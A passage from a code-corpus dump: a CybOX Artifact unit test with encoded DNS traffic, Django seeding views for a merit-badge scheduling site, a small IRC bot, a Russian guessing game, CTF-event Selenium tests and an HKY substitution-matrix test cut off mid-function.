super(Base32Encoding, self).__init__(algorithm="Base32")
def pack(self, data):
return base64.b32encode(data)
def unpack(self, packed_data):
return base64.b32decode(packed_data)
a = Artifact(self.binary_data)
a.packaging = Packaging()
a.packaging.compression.append(Bz2Compression())
a.packaging.encryption.append(XOREncryption(0x4a))
a.packaging.encoding.append(Base32Encoding())
a2 = round_trip(a, Artifact)
self.assertEqual(self.binary_data, a2.data)
class TestArtifactInstance(ObjectTestCase, unittest.TestCase):
object_type = "ArtifactObjectType"
klass = Artifact
_full_dict = {
"packaging": {
"is_encrypted": False,
"is_compressed": False,
"encoding": [
{
"algorithm": "Base64"
}
]
},
"xsi:type": object_type,
"raw_artifact": "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"
"AlgAECABBPgAAAACAAAAAAAAAA3ADAABAAEAAAJYAATMmLhYwWhKQrQ/CwBSAAAA"
"UgAAAADAnzJBjADgGLEMrQgARQAARAAAQABAEWU7wKiqCMCoqhSAHAA1ADACNVpT"
"AQAAAQAAAAAAAAExATABMAMxMjcHaW4tYWRkcgRhcnBhAAAMAAHBaEpCAEILAGkA"
"AABpAAAAAOAYsQytAMCfMkGMCABFAABb2PUAAIARjC7AqKoUwKiqCAA1gBwAR/kw"
"WlOFgAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAA"
"DhAACwlsb2NhbGhvc3QAwWhKQkZLCwBDAAAAQwAAAADAnzJBjADgGLEMrQgARQAA"
"NQAAQABAEWVKwKiqCMCoqhSAHQA1ACGYvSCKAQAAAQAAAAAAAANpc2MDb3JnAAAC"
"AAHBaEpC2ogLAIEAAACBAAAAABKpADIjAGAIReRVCABFAABzh94AAIARapXAqKo4"
"2Q0EGAarADUAXznwMm4BAAABAAAAAAAABV9sZGFwBF90Y3AXRGVmYXVsdC1GaXJz"
"dC1TaXRlLU5hbWUGX3NpdGVzAmRjBl9tc2Rjcwt1dGVsc3lzdGVtcwVsb2NhbAAA"
"IQABwWhKQrWSCwCmAAAApgAAAADgGLEMrQDAnzJBjAgARQAAmNj3AACAEYvvwKiq"
"FMCoqggANYAdAIR72CCKgYAAAQAEAAAAAANpc2MDb3JnAAACAAHADAACAAEAAA4Q"
"AA4GbnMtZXh0BG5ydDHADMAMAAIAAQAADhAADgZucy1leHQEc3RoMcAMwAwAAgAB"
"AAAOEAAJBm5zLWV4dMAMwAwAAgABAAAOEAAOBm5zLWV4dARsZ2ExwAzBaEpCPdYL"
"AIEAAACBAAAAAGAIReRVABKpADIjCABFAABzAABAADoR+HPZDQQYwKiqOAA1BqsA"
"X7VsMm6FgwABAAAAAAAABV9sZGFwBF90Y3AXRGVmYXVsdC1GaXJzdC1TaXRlLU5h"
"bWUGX3NpdGVzAmRjBl9tc2Rjcwt1dGVsc3lzdGVtcwVsb2NhbAAAIQABwWhKQszY"
"CwBiAAAAYgAAAAASqQAyIwBgCEXkVQgARQAAVIfwAACAEWqiwKiqONkNBBgGrAA1"
"AEB8UfFhAQAAAQAAAAAAAAVfbGRhcARfdGNwAmRjBl9tc2Rjcwt1dGVsc3lzdGVt"
"cwVsb2NhbAAAIQABwWhKQmEcDABiAAAAYgAAAABgCEXkVQASqQAyIwgARQAAVAAA"
"QAA6EfiS2Q0EGMCoqjgANQasAED3zfFhhYMAAQAAAAAAAAVfbGRhcARfdGNwAmRj"
"Bl9tc2Rjcwt1dGVsc3lzdGVtcwVsb2NhbAAAIQABwWhKQoAeDACMAAAAjAAAAAAS"
"qQAyIwBgCEXkVQgARQAAfofxAACAEWp3wKiqONkNBBgGrQA1AGp3mINhAQAAAQAA"
"AAAAAAVfbGRhcARfdGNwJDA1YjUyOTJiLTM0YjgtNGZiNy04NWEzLThiZWVmNWZk"
"MjA2OQdkb21haW5zBl9tc2Rjcwt1dGVsc3lzdGVtcwVsb2NhbAAAIQABwWhKQmRr"
"DACMAAAAjAAAAABgCEXkVQASqQAyIwgARQAAfgAAQAA6Efho2Q0EGMCoqjgANQat"
"AGrzFINhhYMAAQAAAAAAAAVfbGRhcARfdGNwJDA1YjUyOTJiLTM0YjgtNGZiNy04"
"NWEzLThiZWVmNWZkMjA2OQdkb21haW5zBl9tc2Rjcwt1dGVsc3lzdGVtcwVsb2Nh"
"bAAAIQABwWhKQvn4DQBTAAAAUwAAAAASqQAyIwBgCEXkVQgARQAARYf1AACAEWqs"
"wKiqONkNBBgGrgA1ADEajdBgAQAAAQAAAAAAAAVHUklNTQt1dGVsc3lzdGVtcwVs"
"b2NhbAAAAQABwWhKQhU7DgBTAAAAUwAAAABgCEXkVQASqQAyIwgARQAARQAAQAA6"
"Efih2Q0EGMCoqjgANQauADGWCdBghYMAAQAAAAAAAAVHUklNTQt1dGVsc3lzdGVt"
"cwVsb2NhbAAAAQAByWhKQuJzBQBTAAAAUwAAAAASqQAyIwBgCEXkVQgARQAARYf7"
"AACAEWqmwKiqONkNBBgGrwA1ADF0iXZjAQAAAQAAAAAAAAVHUklNTQt1dGVsc3lz"
"dGVtcwVsb2NhbAAAAQAByWhKQj+6BQBTAAAAUwAAAABgCEXkVQASqQAyIwgARQAA"
"RQAAQAA6Efih2Q0EGMCoqjgANQavADHwBXZjhYMAAQAAAAAAAAVHUklNTQt1dGVs"
"c3lzdGVtcwVsb2NhbAAAAQAB",
"type": "Network Traffic"
}
class TestArtifactPattern(ObjectTestCase, unittest.TestCase):
object_type = "ArtifactObjectType"
klass = Artifact
_full_dict = {
"xsi:type": object_type,
"raw_artifact": {
"value": "777777076578616D706C6503636F6D",
"condition": "Contains"
},
"type": "Network Traffic"
}
def _get_data(artifact):
return artifact.data
def _set_data(artifact, data):
artifact.data = data
def _get_packed_data(artifact):
return artifact.packed_data
def _set_packed_data(artifact, packed_data):
artifact.packed_data = packed_data
if __name__ == "__main__":
unittest.main()
| bsd-3-clause | -5,257,391,500,111,791,000 | 48.567823 | 109 | 0.669 | false |
miguelut/utmbu | dev/views.py | 1 | 8285 | from django.shortcuts import render, redirect
from django.contrib.auth.models import User, Permission
from django.contrib.auth.hashers import make_password
from django.contrib.contenttypes.models import ContentType
from mbu.models import *
from datetime import date, datetime
import os
# Create your views here.
def setup_data(request):
insert_courses()
# councils = create_councils()
# troop, create = Troop.objects.get_or_create(number=int('464'), council=councils[0])
# mbu, create = MeritBadgeUniversity.objects.get_or_create(name='MBU 2015', year=date.today(), current=True)
# timeblocks = create_timeblocks(mbu)
# courses = seed_courses()
# course_instances = create_course_instances(courses, timeblocks)
# user1, create = User.objects.get_or_create(first_name='First1', last_name='Last1', email="[email protected]", username='test1', password=make_password('test1'))
# user2, create = User.objects.get_or_create(first_name='First2', last_name='Last2', email="[email protected]", username='test2', password=make_password('test2'))
# ct = ContentType.objects.get_for_model(Scout)
# p = Permission.objects.get(content_type=ct, codename='edit_scout_schedule')
# user1.user_permissions.add(p)
# user2.user_permissions.add(p)
# scout1, create = Scout.objects.get_or_create(user=user1, rank='Star', troop=troop, waiver=False)
# scout2, create = Scout.objects.get_or_create(user=user2, rank='Star', troop=troop, waiver=False)
return redirect('mbu_home')
def seed_courses():
result = []
files = os.listdir('./static/images/badges')
for file in files:
name = file.replace('_',' ').replace('.jpg', '')
course, create = Course.objects.get_or_create(name=name, image_name=file)
result.append(course)
return result
def create_timeblocks(mbu):
result = []
timeblock1, create = TimeBlock.objects.get_or_create(name='Session 1', start_time=datetime(2015,2,14,8,0,0), end_time=datetime(2015,2,14,10,0,0), mbu=mbu)
timeblock2, create = TimeBlock.objects.get_or_create(name='Session 2', start_time=datetime(2015,2,14,10,0,0), end_time=datetime(2015,2,14,12,0,0), mbu=mbu)
timeblock3, create = TimeBlock.objects.get_or_create(name='Session 3', start_time=datetime(2015,2,14,13,0,0), end_time=datetime(2015,2,14,15,0,0), mbu=mbu)
timeblock4, create = TimeBlock.objects.get_or_create(name='Session 4', start_time=datetime(2015,2,14,15,0,0), end_time=datetime(2015,2,14,17,0,0), mbu=mbu)
timeblock5, create = TimeBlock.objects.get_or_create(name='Session 1-Double', start_time=datetime(2015,2,14,8,0,0), end_time=datetime(2015,2,14,12,0,0), mbu=mbu, double=True)
timeblock6, create = TimeBlock.objects.get_or_create(name='Session 3-Double', start_time=datetime(2015,2,14,13,0,0), end_time=datetime(2015,2,14,17,0,0), mbu=mbu, double=True)
result.append(timeblock1)
result.append(timeblock2)
result.append(timeblock3)
result.append(timeblock4)
result.append(timeblock5)
result.append(timeblock6)
return result
def create_course_instances(courses, timeblocks):
result = []
mod = len(timeblocks)
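    # Distribute the courses over the available timeblocks round-robin,
    # using the course index modulo the number of timeblocks.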
for idx, val in enumerate(courses):
timeblock = timeblocks[idx % mod]
course_instance, create = ScoutCourseInstance.objects.get_or_create(course=val, timeblock=timeblock, location='Room %s' % str(idx), max_enrollees=10)
result.append(course_instance)
return result
def create_councils():
result = []
with open('./dev/councils.csv', 'r') as lines:
for line in lines:
number, name, city, state = line.strip().split(',')
council, create = Council.objects.get_or_create(number=int(number), name=name, city=city, state=state)
result.append(council)
return result
def insert_courses():
assignments = [
("American Business", 1),
("American Cultures", 2),
("American Labor", 3),
("Animation", 1),
("Animation", 2),
("Animation", 3),
("Animation", 4),
("Architecture", 5),
("Architecture", 6),
("Archaeology", 3),
("Art", 1),
("Art", 2),
("Art", 3),
("Art", 4),
("Aviation", 1),
("Aviation", 2),
("Chess", 1),
("Chess", 2),
("Chess", 3),
("Chess", 4),
("Chemistry", 1),
("Chemistry", 2),
("Chemistry", 3),
("Chemistry", 4),
("Citizenship in the Community", 1),
("Citizenship in the Community", 2),
("Citizenship in the Community", 3),
("Citizenship in the Community", 4),
("Citizenship in the Community", 1),
("Citizenship in the Community", 2),
("Citizenship in the Community", 3),
("Citizenship in the Community", 4),
("Citizenship in the Nation", 5),
("Citizenship in the Nation", 6),
("Citizenship in the Nation", 5),
("Citizenship in the Nation", 6),
("Citizenship in the World", 1),
("Citizenship in the World", 2),
("Citizenship in the World", 3),
("Citizenship in the World", 4),
("Citizenship in the World", 1),
("Citizenship in the World", 2),
("Citizenship in the World", 3),
("Communication", 1),
("Communication", 2),
("Communication", 3),
("Communication", 4),
("Communication", 1),
("Communication", 2),
("Communication", 3),
("Communication", 4),
("Cooking", 1),
("Cooking", 2),
("Cooking", 3),
("Cooking", 4),
("Cooking", 1),
("Cooking", 2),
("Cooking", 3),
("Cooking", 4),
("Crime Prevention", 3),
("Crime Prevention", 4),
("Emergency Preparedness", 1),
("Emergency Preparedness", 2),
("Emergency Preparedness", 3),
("Emergency Preparedness", 4),
("Energy", 1),
("Energy", 2),
("Engineering", 5),
("Engineering", 6),
("Family Life", 1),
("Family Life", 2),
("Family Life", 3),
("Family Life", 4),
("Family Life", 1),
("Family Life", 2),
("Family Life", 3),
("Family Life", 4),
("Fingerprinting", 1),
("Fingerprinting", 2),
("Fingerprinting", 3),
("Fingerprinting", 4),
("Fire Safety", 3),
("Fire Safety", 4),
("First Aid", 5),
("First Aid", 6),
("First Aid", 5),
("First Aid", 6),
("Geology", 4),
("Inventing", 1),
("Law", 2),
("Medicine", 5),
("Moviemaking", 1),
("Moviemaking", 2),
("Moviemaking", 3),
("Moviemaking", 4),
("Music", 1),
("Music", 2),
("Music", 3),
("Music", 4),
("Nuclear Science", 5),
("Nuclear Science", 6),
("Painting", 1),
("Painting", 2),
("Personal Fitness", 1),
("Personal Fitness", 2),
("Personal Fitness", 3),
("Personal Fitness", 4),
("Personal Management", 1),
("Personal Management", 2),
("Personal Management", 3),
("Personal Management", 4),
("Personal Management", 1),
("Personal Management", 2),
("Personal Management", 3),
("Personal Management", 4),
("Photography", 3),
("Photography", 4),
("Public Health", 3),
("Public Speaking", 4),
("Radio", 5),
("Radio", 6),
("Safety", 1),
("Salesmanship", 2),
("Scholarship", 3),
("Sculpture", 1),
("Sculpture", 2),
("Sculpture", 3),
("Sculpture", 4),
("Space Exploration", 3),
("Space Exploration", 4),
("Sports", 1),
("Sports", 2),
("Surveying", 5),
("Veterinary Medicine", 1),
("Veterinary Medicine", 2),
("Weather", 4)
]
for name, id in assignments:
max = 20
try:
badge = Course.objects.get(name=name)
timeblock = TimeBlock.objects.get(pk=id)
ScoutCourseInstance.objects.create(course=badge, timeblock=timeblock, max_enrollees=max)
except Exception as e:
print(name)
print(e) | mit | 3,891,566,924,007,851,000 | 35.502203 | 179 | 0.567532 | false |
raizkane/RaizBot | src/main.py | 1 | 2831 | #!/usr/bin/env python
'''
Copyright (C) 2015 Raiz Kane <[email protected]>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published
by the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
# Importing necessary libraries/modules
import socket
# Functions must be defined here for later execution
server = "irc.oftc.net"
channel = "#botcontrol"
botnick = "RaizBot"
def ping():
ircsock.send("PONG :pingis\n")
def sendmsg(chan, msg):
ircsock.send("PRIVMSG "+ chan +" :"+ msg +"\n")
def joinchan(chan):
ircsock.send("JOIN "+ chan +"\n")
# The whole code goes here
ircsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ircsock.connect((server, 6667))
ircsock.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :This bot is a result of a tutoral covered on http://shellium.org/wiki.\n")
ircsock.send("NICK "+ botnick +"\n")
joinchan(channel)
joinchan("#oftc-hacker")
joinchan("#nottor")
while 1:
ircmsg = ircsock.recv(2048)
ircmsg = ircmsg.strip('\n\r')
print(ircmsg)
if ircmsg.find(":#nottor, contact") != -1:
sendmsg("#nottor", "[0x2C1A25C7] Raiz Kane <[email protected]>")
sendmsg("#nottor", " E9B9 460F 0389 F4AC 713C")
sendmsg("#nottor", " EEDA 13D1 E8BF 2C1A 25C7")
if ircmsg.find(":#oftc-hacker, contact") != -1:
sendmsg("#oftc-hacker", "[0x2C1A25C7] Raiz Kane <[email protected]>")
sendmsg("#oftc-hacker", " E9B9 460F 0389 F4AC 713C")
sendmsg("#oftc-hacker", " EEDA 13D1 E8BF 2C1A 25C7")
if ircmsg.find(":#nottor, map") != -1:
sendmsg("#nottor", "OFTC channels map <https://github.com/raizkane/OFTC-channels-map> for more info visit #map.")
if ircmsg.find(":#oftc-hacker, map") != -1:
sendmsg("#oftc-hacker", "OFTC channels map <https://github.com/raizkane/OFTC-channels-map> for more info visit #map.")
if ircmsg.find(":#nottor, awesomepentest") != -1:
sendmsg("#nottor", "https://github.com/enaqx/awesome-pentest")
if ircmsg.find(":#oftc-hacker, awesomepentest") != -1:
sendmsg("#oftc-hacker", "https://github.com/enaqx/awesome-pentest")
if ircmsg.find(":#nottor, who") != -1:
sendmsg("#nottor", "Hey, I'm RaizBot, Raiz made me to make his life easier")
if ircmsg.find(":#oftc-hacker, who") != -1:
sendmsg("#oftc-hacker", "Hey, I'm RaizBot, Raiz made me to make his life easier")
if ircmsg.find("PING :") != -1:
ping()
| agpl-3.0 | 3,580,462,610,263,847,000 | 31.54023 | 136 | 0.692688 | false |
Mariaanisimova/pythonintask | PINp/2014/Valkovskey_M_A/task_7_49.py | 1 | 1588 | # Задача 7. Вариант 49.
#Разработайте систему начисления очков для задачи 6, в соответствии с которой игрок получал бы большее количество баллов за меньшее количество попыток.
#Valkovskey M.A.
import random
print("Попробуй угадать, название одного из четырнадцати гражданских чинов, занесенных в Петровскую Табель о рангах ")
a = random.choice(['Канцлер','Действительный тайный советник','Тайный советник', 'Действительный статский советник', 'Статский советник', 'Коллежский советник', 'Надворный советник ', 'Коллежский асессор', 'Титулярный советник', 'Коллежский секретарь', 'Губернский секретарь', 'Коллежский регистратор'])
b=input("Твой ответ:")
i=0
while b!=a:
print("Ты ошибся, попробуй снова")
i+=1
b=input("Твой ответ:")
else:
print("Ты абсолютно прав!")
print("Число твоих попыток: " + str(i))
if i==1:
score = 100
elif i>1:
score = 100-i*10
print("Твой финальный счет: " +str(score))
input("\nВведите Enter для завершения")
| apache-2.0 | 2,044,916,938,491,587,000 | 43.391304 | 303 | 0.695397 | false |
BurningNetel/ctf-manager | functional_tests/event/test_creating_event.py | 1 | 6665 | import time
from datetime import timedelta
from django.core.urlresolvers import reverse
from django.utils import timezone, formats
from CTFmanager.models import Event
from functional_tests.base import FunctionalTest
from functional_tests.pages.event.add_event_page import NewEventPage, NewEventPageFields
from functional_tests.pages.event.event_detail_page import EventDetailPage
from functional_tests.pages.event.event_page import EventPage
class NewEventTests(FunctionalTest):
def test_can_create_an_event_from_event_page_and_retrieve_it_later(self):
self.create_and_login_user()
ep = EventPage(self)
# a user goes to the events page
ep.get_page()
# He checks the pages' title is correct
self.assertIn(ep.title, self.browser.title)
self.assertIn(reverse(ep.name), self.browser.current_url)
# the user wants to add a new event,
# so he clicks on the button to add a new event
btn_add_event = ep.get_add_event_button()
self.assertEqual(btn_add_event.get_attribute('text'), 'Add Event')
btn_add_event.click()
nep = NewEventPage(self)
# The browser redirects to a new page
self.assertIn(reverse(nep.name), self.browser.current_url)
# The users fills in all the mandatory data
# The events name
tb_name = nep.get_name_input()
name = 'Hacklu'
tb_name.send_keys(name)
# The date and time that the event starts
datetime = nep.get_date_input()
self.assertEqual(NewEventPageFields.date_ph.value,
datetime.get_attribute('placeholder'))
# The date of the upcoming event is filled in the date textbox
datetime.clear()
_date = timezone.now() + timedelta(days=1)
formatted_date = formats.date_format(_date, "SHORT_DATETIME_FORMAT")
datetime.send_keys(str(_date.year) + '-' +
('0' + str(_date.month))[-2:] + '-' +
('0' + str(_date.day))[-2:] + " " +
str(_date.hour) + ":" +
str(_date.minute)
)
# Then, the user clicks the 'confirm' button
# when every necessary field has been filled in.
btn_confirm = nep.get_confirm_button()
self.assertEqual('btn btn-primary', btn_confirm.get_attribute('class'))
self.assertEqual('Save', btn_confirm.get_attribute('value'))
btn_confirm.click()
# The browser redirects the user to the events page
self.assertIn(reverse(ep.name), self.browser.current_url)
self.assertNotIn(reverse(nep.name), self.browser.current_url)
# The new event is now visible on the events page
lg_upcoming = ep.get_upcoming_list_group()
rows = lg_upcoming.find_elements_by_tag_name('h4')
self.assertTrue(
any(name in row.text for row in rows)
)
self.assertTrue(
any(formatted_date in row.text for row in rows)
)
# The users wants to view details about the event
# He clicks on the link that is the name of the event to go to the details page
ep.click_on_event_in_upcoming_list_group(name)
self.assertIn('CTFman - ' + name, self.browser.title)
def test_duplicate_event_test(self):
self.create_and_login_user()
# A user wants to create an event for 2015 and for 2016,
# but uses the same name
nep = NewEventPage(self).get_page()
self.assertIn(reverse(nep.name), self.browser.current_url)
# The users creates the first event, it submits correctly.
name = 'CTF' + str(round(time.time()))
date = '2016-01-01 18:00'
nep.submit_basic_event(name, date)
self.assertNotIn(reverse(nep.name), self.browser.current_url)
# The users adds another event
nep.get_page()
self.assertIn(reverse('newEvent'), self.browser.current_url)
# He uses the same name
date2 = '2015-01-01 18:00'
nep.submit_basic_event(name, date2)
# The form now shows a error
self.assertIn(reverse(nep.name), self.browser.current_url)
self.browser.find_element_by_css_selector('.has-error')
def test_new_event_with_optional_fields_filled(self):
""" This test tests the add_event form, and the event detail page for optional fields
The user is going to add a new event,
He knows a lot about the event, so he is able to fill in all optional fields too
At the end of this test, he check if the optional fields are displayed on the events detail page.
The optional fields are: Description, Location, End_Date, Credentials, URL
(hidden fields): Creation_Date, Created_By
"""
self.create_and_login_user()
# browse to new event page
nep = NewEventPage(self).get_page()
# The user fills in all the field
next_year = (timezone.now() + timedelta(days=365)).year
nep.submit_complete_event('optionalEvent',
'%s-01-01' % next_year,
'test' * 30,
'Eindhoven',
'%s-01-02' % next_year,
'CTF_TEAM_NAME',
'SECURE_PASSWORD',
'hatstack.nl',
10,
1200)
# The user is now at the events overview page.
# He now goes to it's detail page
_event = Event.objects.first()
edp = EventDetailPage(self, _event.name)
edp.get_page()
# He checks if all the information is correct
description = edp.get_description_p()
location = edp.get_location()
url = edp.get_url()
        username = edp.get_username()
        password = edp.get_password()
# The header contains the events title, date, end date
header = edp.get_header()
edp.toggle_credentials_panel()
# Open the hidden field
time.sleep(1) # Wait for selenium to see the hidden fields.
self.assertIn('test' * 30, description.text)
self.assertIn('Eindhoven', location.text)
self.assertIn('hatstack.nl', url.text)
self.assertIn('CTF_TEAM_NAME', username.text)
self.assertIn('SECURE_PASSWORD', password.text)
self.assertIn('Jan. 1, %s' % next_year, header.text)
self.assertIn(' - ', header.text)
self.assertIn('Jan. 2, %s' % next_year, header.text) | gpl-3.0 | -7,033,169,181,387,475,000 | 40.403727 | 105 | 0.595649 | false |
mdrasmus/spimap | test/hky.py | 1 | 2892 | """
test HKY matrix
"""
import sys, unittest, ctypes
from pprint import pprint
from math import *
sys.path.append("python")
import spidir
from test import *
from rasmus.common import *
rplot_set_viewer("display")
class HKY (unittest.TestCase):
def test_hky(self):
"""general test"""
bgfreq = [.3, .2, .3, .2]
kappa = 2.0
t = 0.2
pprint(spidir.make_hky_matrix(bgfreq, kappa, t))
pprint(phylo.make_hky_matrix(t, bgfreq, kappa))
def test_hky_deriv(self):
"""general test"""
bgfreq = [.3, .2, .3, .2]
kappa = 2.0
i = random.randint(0, 3)
j = random.randint(0, 3)
x = list(frange(0, 1.0, .01))
y = [spidir.make_hky_matrix(bgfreq, kappa, t)[i][j]
for t in x]
dy = [spidir.make_hky_deriv_matrix(bgfreq, kappa, t)[i][j]
for t in x]
dy2 = [(spidir.make_hky_matrix(bgfreq, kappa, t+.01)[i][j] -
spidir.make_hky_matrix(bgfreq, kappa, t)[i][j]) / .01
for t in x]
prep_dir("test/output/hky")
rplot_start("test/output/hky/hky_deriv.pdf")
rplot("plot", x, y, t="l", ylim=[min(dy + y), max(dy + y)])
rp.lines(x, dy, col="red")
rp.lines(x, dy2, col="blue")
rplot_end(True)
def test_hky_deriv2(self):
"""general test"""
bgfreq = [.3, .2, .3, .2]
kappa = 2.0
i = random.randint(0, 3)
j = random.randint(0, 3)
x = list(frange(0, 1.0, .01))
y = [spidir.make_hky_deriv_matrix(bgfreq, kappa, t)[i][j]
for t in x]
dy = [spidir.make_hky_deriv2_matrix(bgfreq, kappa, t)[i][j]
for t in x]
dy2 = [(spidir.make_hky_deriv_matrix(bgfreq, kappa, t+.01)[i][j] -
spidir.make_hky_deriv_matrix(bgfreq, kappa, t)[i][j]) / .01
for t in x]
prep_dir("test/output/hky2")
rplot_start("test/output/hky2/hky_deriv2.pdf")
rplot("plot", x, y, t="l", ylim=[min(dy2 + dy + y), max(dy2 + dy + y)])
rp.lines(x, dy, col="red")
rp.lines(x, dy2, col="blue")
rplot_end(True)
def test_jc(self):
"""test equivalence to JC"""
bgfreq = [.25, .25, .25, .25]
kappa = 1.0
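        # With kappa = 1 and uniform base frequencies, HKY reduces to the
        # Jukes-Cantor (JC69) model, whose transition probabilities have the
        # closed form below: r on the diagonal, s off the diagonal.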
